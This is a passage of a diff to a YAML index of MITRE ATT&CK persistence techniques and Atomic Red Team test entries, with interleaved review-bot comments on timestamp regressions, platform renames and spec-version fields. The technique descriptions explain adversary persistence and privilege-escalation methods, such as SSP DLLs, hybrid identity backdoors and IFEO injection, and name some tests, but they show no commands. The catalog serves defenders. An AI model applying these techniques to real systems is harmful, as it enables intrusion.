+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_detection: |-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Application Log: Application Log Content'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.011:
technique:
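Review bot: the new T1098.007 entry ships with `x_mitre_detection: ''` and `atomic_tests: []`, and lists `macOS` under `x_mitre_platforms` although its description only covers the Windows `net localgroup`/`net group` and Linux `usermod` paths; if that mirrors upstream it is acceptable, but the only data source given is `User Account: User Account Modification`, so a defender reading this entry has nothing to build a detection from. Separately, the T1137.005 block drops `x_mitre_permissions_required` (`Administrator`, `User`) with no replacement, consistent with the other entries in the patch that remove that key, and moves its platform from `Office 365` to `Office Suite` with `x_mitre_version` bumped to 1.2.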
@@ -51348,7 +51782,7 @@ persistence:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
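Review bot: the `modified` timestamp for T1546.011 moves backward, from '2022-04-25T14:00:00.188Z' to '2020-11-10T18:29:31.094Z'; the same backward move happens further down for T1037.002, T1205, Implant Internal Image, T1547.005 and T1543.004, and the old values all share the `14:00:00.188Z` suffix, which suggests the previous index was generated from a different STIX snapshot. State in the commit message that the new values are the ones carried by the current ATT&CK data, so nobody later treats them as regressions and reverts them.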
@@ -51403,8 +51837,6 @@ persistence:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests:
- name: Application Shim Installation
@@ -51493,7 +51925,7 @@ persistence:
elevation_required: true
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
@@ -51554,9 +51986,9 @@ persistence:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -51565,7 +51997,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests:
- name: Add Port Monitor persistence in Registry
@@ -51642,7 +52073,7 @@ persistence:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -51663,12 +52094,11 @@ persistence:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -51752,11 +52182,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -51769,7 +52198,6 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -51782,7 +52210,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -51812,7 +52239,8 @@ persistence:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests:
- name: Shortcut Modification
@@ -51895,7 +52323,7 @@ persistence:
url: https://github.com/RhinoSecurityLabs/ccat
description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
Retrieved September 12, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:27:49.094Z'
name: Implant Internal Image
description: |-
Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
@@ -51917,8 +52345,6 @@ persistence:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.005:
technique:
@@ -51944,7 +52370,7 @@ persistence:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -51970,8 +52396,6 @@ persistence:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests:
- name: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider
@@ -52015,30 +52439,30 @@ persistence:
elevation_required: true
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
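Review bot: the Azure AD to Entra ID rename in this hunk correctly leaves `AzureADConnectAuthenticationAgentService` untouched (it is the literal Windows service name) and keeps the `(Citation: Azure AD ...)` keys, which must continue to match their `source_name` entries in `external_references`; anyone extending the rename to other techniques should apply the same rule and change prose only, never identifiers or citation keys.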
@@ -52046,9 +52470,9 @@ persistence:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -52057,21 +52481,22 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
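Review bot: `x_mitre_platforms` for T1556.007 drops `Azure AD`, `Google Workspace` and `Office 365` in favour of `Office Suite` and `Identity Provider`, with `x_mitre_version` bumped to 1.1, and T1078.001 gets the same treatment later in the patch (version 1.4); anything that filters or indexes on the old platform strings must be updated in the same change, or these techniques will silently disappear from those per-platform views.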
@@ -52111,13 +52536,10 @@ persistence:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.004:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:48.453Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/
and /Library/LaunchDaemons/
. Required Launch Daemons parameters include a Label
to identify the task, Program
to provide a path to the executable, and RunAtLoad
to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
@@ -52194,12 +52616,11 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1543.004
atomic_tests: []
T1574.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:25:57.059Z'
name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -52218,6 +52639,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Stefan Kanthak
+ x_mitre_deprecated: false
x_mitre_detection: |
Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
@@ -52225,7 +52647,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -52245,29 +52666,31 @@ persistence:
id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
created: '2020-03-13T17:48:58.999Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1574/008
external_id: T1574.008
+ - source_name: Microsoft Environment Property
+ description: Microsoft. (2011, October 24). Environment Property. Retrieved
+ July 27, 2016.
+ url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+ - source_name: Microsoft WinExec
+ description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
- source_name: Windows NT Command Shell
description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
December 5, 2014.
url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
- - source_name: Microsoft WinExec
- description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms687393
- - source_name: Microsoft Environment Property
- description: Microsoft. (2011, October 24). Environment Property. Retrieved
- July 27, 2016.
- url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.008
atomic_tests:
- name: powerShell Persistence via hijacking default modules - Get-Variable.exe
@@ -52360,7 +52783,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.003
atomic_tests:
- name: Web Shell Written to Disk
@@ -52404,7 +52826,7 @@ persistence:
name: command_prompt
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -52419,6 +52841,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -52427,18 +52850,18 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
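Review bot: the `x_mitre_platforms` change here drops `Azure AD`, `Office 365` and `Google Workspace` for T1078.001 and adds `Office Suite` and `Identity Provider` alongside the version bump to '1.4'. Any per-platform index that is generated from this field will silently lose this technique under the old names unless the generator and its output file names are updated for the consolidated platform names in the same change; worth checking that the platform-keyed outputs were regenerated rather than hand-edited.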
@@ -52470,9 +52893,6 @@ persistence:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests:
- name: Enable Guest account with RDP capability and admin privileges
@@ -52611,7 +53031,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests:
- name: Create a new time provider
@@ -52690,7 +53109,7 @@ persistence:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
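Review bot: the `modified` timestamp for T1546.005 moves backwards in this hunk, from '2021-04-29T14:49:39.188Z' to '2020-03-24T16:43:02.273Z', and the same backwards move recurs for several other techniques later in this diff. The old values share a suspicious `.188Z` suffix, which suggests they were bulk-assigned rather than taken from the source objects, so the new values are probably the authoritative ones, but a timestamp regression is the kind of thing that trips "newer than" logic in consumers; please confirm the source and note it in the PR description.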
@@ -52716,13 +53135,11 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
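Review bot: for T1546.005 this hunk removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` with no replacement value visible, whereas other entries in this diff keep `x_mitre_attack_spec_version` and raise it to 3.2.0. If the new value is added elsewhere in the object it is outside this hunk; otherwise the entry ends up without any spec version at all, which is inconsistent with the rest of the file and should be checked against the generator output.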
@@ -52843,7 +53260,6 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1136.001:
@@ -52915,7 +53331,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.001
atomic_tests:
- name: Create a new user in a command prompt
@@ -53068,7 +53483,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests:
- name: Winlogon Shell Key Persistence - PowerShell
@@ -53301,7 +53715,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests: []
T1546.012:
@@ -53355,7 +53768,7 @@ persistence:
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -53388,8 +53801,6 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests:
- name: IFEO Add Debugger
@@ -53516,7 +53927,7 @@ persistence:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -53551,12 +53962,10 @@ persistence:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -53633,7 +54042,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests:
- name: Attaches Command Prompt as a Debugger to a List of Target Processes
@@ -53820,7 +54228,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.002
atomic_tests:
- name: Create a new Windows domain admin user
@@ -53943,7 +54350,7 @@ persistence:
health and make sure it's not already dying on you. Retrieved October 2,
2018.
source_name: ITWorld Hard Disk Health Dec 2014
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-01T20:43:55.632Z'
name: Component Firmware
description: |-
Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -53973,55 +54380,10 @@ persistence:
- SYSTEM
x_mitre_system_requirements:
- Ability to update component device firmware from the host operating system.
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.001:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
